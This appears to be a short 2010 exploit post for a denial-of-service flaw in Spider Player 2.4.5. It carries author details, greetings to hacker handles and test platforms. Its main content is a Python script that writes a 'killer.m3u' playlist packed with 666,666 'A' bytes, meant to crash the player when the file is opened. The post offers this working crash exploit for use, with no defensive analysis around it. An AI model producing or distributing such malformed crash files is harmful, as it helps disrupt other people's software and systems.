Spider Player 2.4.5 Denial of Service Vulnerability
来源:abdimohamed@hotmail.fr 作者:MOHAMED 发布时间:2010-10-25
#Exploit Title : Spider Player Denial of Service Vulnerability #Software : Spider Player #Software link : http://spider-player.com/spider/files/Spider_Player_2.4.5_Setup.exe #Autor : ABDI MOHAMED #Email : abdimohamed@hotmail.fr #greetz: net_own3r , sadhacker , net-decrypt3r , xa7m3d , the commander , mr.fearfactor and all tunisian hackers #Software version : 2.4.5 #Tested on : Win7 Ultimate fr + win xp sp 2 #!/usr/bin/python outfile="killer.m3u" junk="\x41" * 666666 FILE=open(outfile, "w") FILE.write(junk) FILE.close() print "[+] File created succesufully , [+]"
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